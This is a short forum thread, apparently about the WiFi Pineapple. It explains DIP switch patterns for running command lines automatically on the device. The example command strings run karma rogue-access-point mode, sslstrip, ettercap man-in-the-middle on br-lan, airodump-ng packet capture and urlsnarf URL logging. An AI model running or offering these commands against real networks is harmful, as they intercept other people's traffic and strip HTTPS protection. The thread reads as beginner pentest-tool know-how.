How to configuring DIP Switches

daniboy92

On one of your switches put something like: "pineapple karma start; sslstrip -s -a; ettercap -i br-lan" just make shure you put a ; after each command. Just run the ettercap en sslstrip command with -h on a ssh session and find the switches you are looking for!

heres the dip switch patterns just for clarity.

DIP: (1,2,3,4,5)

1 2 3 4 5

* * - do not use, system reserved

1=on=up position

0=off=down position

2 3 4

off off on == 001 == factory reset (not commandable)

off off off == 000 == commandable

off on off == 010 == commandable

on off off == 100 == commandable

on on off == 110 == commandable

off on on == 011 == commandable

on off on == 101 == commandable

on on on == 111 == commandable (default setting, not recommended unless it's default commands)

only one dip switch command line can be used at a time, but multiple commands can be strung together on one line using the ";".

Examples:

ifconfig wlan1 up; airmon-ng start wlan1; airodump-ng --write /sd/airodump.pcap --output-format pcap mon0;

hostapd_cli -p /var/run/hostapd-phy0 karma_enable; urlsnarf -i br-lan > /sd/infusions/urlsnarf/includes/log/output_`date +%s`.log &

changemac -r && hostapd_cli -p /var/run/hostapd-phy0 karma_change_ssid "some_net"

hope this helps some of you noobies staring woefullky at the dip switches

Karma and sslstrip works, but ettercap doesn't start with that command...

Like i said,. you need to work out the parameters that work for you! The command i gave was just an example. DOnt forget to seperate all commands with ;

SSH into your pineapple using putty etc. run the command ettercap from there and see what parameters you can use. Get it to work on the cli. Oce you have a working command line put that in your dipswitch config.